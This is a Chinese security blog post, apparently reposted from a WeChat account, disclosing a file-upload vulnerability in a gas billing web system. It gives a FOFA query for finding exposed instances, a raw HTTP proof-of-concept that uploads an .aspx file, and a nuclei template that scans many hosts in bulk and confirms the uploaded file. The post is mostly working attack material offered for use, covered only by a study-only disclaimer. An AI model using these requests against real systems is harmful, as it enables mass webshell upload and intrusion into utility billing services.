某燃气收费系统文件上传漏洞

2024年1月10日13:02:48评论102 views字数 2126阅读7分5秒阅读模式

一、免责声明：

本次文章仅限个人学习使用，如有非法用途均与作者无关，且行且珍惜；由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除整改并向您致以歉意。谢谢！

二、产品介绍：

某燃气收费系统文件上传漏洞

三、资产梳理：

fofa：app="先锋WEB燃气收费系统"

四、漏洞复现：

某燃气收费系统文件上传漏洞

五、POC：

GET /AjaxService/Upload.aspx HTTP/1.1Host: targetUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------352149293954742437289922451Content-Length: 351Origin: nullConnection: closeUpgrade-Insecure-Requests: 1-----------------------------352149293954742437289922451Content-Disposition: form-data; name="Fdata"; filename="123.aspx"Content-Type: application/octet-streamhello-----------------------------352149293954742437289922451Content-Disposition: form-data; name="submit"Submin-----------------------------352149293954742437289922451--

nuclei批量

id: xianfeng_files_uploadinfo:  name: xianfeng_files_upload  author: joyboy  severity: critical  description: 先锋WEB燃气收费系统文件上传漏洞  metadata:    max-request: 1    fofa-query: app="先锋WEB燃气收费系统"    verified: true  tags: rcerequests:  - raw:      - |-        POST /AjaxService/Upload.aspx HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0        Content-Type: multipart/form-data; boundary=---------------------------352149293954742437289922451        Content-Length: 349        Origin: null        Connection: close        Upgrade-Insecure-Requests: 1        -----------------------------352149293954742437289922451        Content-Disposition: form-data; name="Fdata"; filename="123.aspx"        Content-Type: application/octet-stream        hello        -----------------------------352149293954742437289922451        Content-Disposition: form-data; name="submit"        Submin        -----------------------------352149293954742437289922451--      - |-        GET /UploadFile/{{date_time("%Y%M")}}/{{timestrp}} HTTP/1.1        Host: {{Hostname}}    extractors:      - type: regex        name: timestrp        internal: true        part: body        regex:          - '[0-9]{16}.aspx'     matchers-condition: and    matchers:      - type: word        part: body_2        words:          - hello      - type: status        status:          - 200

某燃气收费系统文件上传漏洞

原文始发于微信公众号（fly的渗透学习笔记）：某燃气收费系统文件上传漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

某燃气收费系统文件上传漏洞

Kubernetes CVE-2025-1974 RCE

CVE-2025-27218｜Sitecore CMS远程代码执行漏洞

CentreStack 反序列化漏洞 (CVE-2025-30406)

Windows提权漏洞CVE-2025-21204

漏洞预警博华X龙防火墙系统 arp_scan文件读取漏洞

网安人的咯噔文学|CVE-2025-404NotFound？

CVE-2025-21204: Windows Update Stack 中的不当链接跟随导致的权限提升

Windows 提权漏洞速报：CVE-2025-21204

Jupyter Remote Desktop未授权访问漏洞CVE-2025-32428

F5 BIG-IP命令注入漏洞CVE-2025-23239

发表评论

在线咨询

微信